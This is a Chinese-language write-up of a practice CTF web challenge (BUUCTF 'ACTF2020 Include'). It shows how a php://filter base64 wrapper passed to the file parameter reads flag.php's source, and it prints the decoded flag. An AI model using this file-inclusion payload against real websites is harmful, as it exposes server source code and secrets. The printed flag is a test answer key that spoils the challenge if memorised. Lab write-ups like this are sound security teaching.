[BUUCTF][Web][ACTF2020 新生賽]Include 1
阿新 • • 發佈:2022-12-07
開啟靶機對應的url
顯示一個tips 超連結
點選訪問超連結,對應Url為
http://469398f2-5677-4270-a4a4-55c5e4a7504a.node4.buuoj.cn:81/?file=flag.php
顯示資訊Can you find out the flag
, 右鍵檢視原始碼沒有任何內容
猜測flag在flag.php 原始碼中
嘗試通過php偽協議查出原始碼
考察知識點: php://filter(本地磁碟檔案進行讀取) 元封裝器,設計用於”資料流開啟”時的”篩選過濾”應用,對本地磁碟檔案進行讀寫。 【php://協議】 條件: 不需要開啟allow_url_fopen,僅php://input、 php://stdin、 php://memory 和 php://temp 需要開啟allow_url_include。 php:// 訪問各個輸入/輸出流(I/O streams),在CTF中經常使用的是php://filter和php://input,php://filter用於讀取原始碼,php://input用於執行php程式碼。
構造url(使用base64編碼原因,防止檔案被當做php被執行)
http://469398f2-5677-4270-a4a4-55c5e4a7504a.node4.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php
得到
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7ZmQ3ZjhmYTAtNjJjZi00NTVlLThmYTMtNWNhMTY2MDJkNTdifQo=
base64轉碼得到
<?php echo "Can you find out the flag?"; //flag{fd7f8fa0-62cf-455e-8fa3-5ca16602d57b}
Boom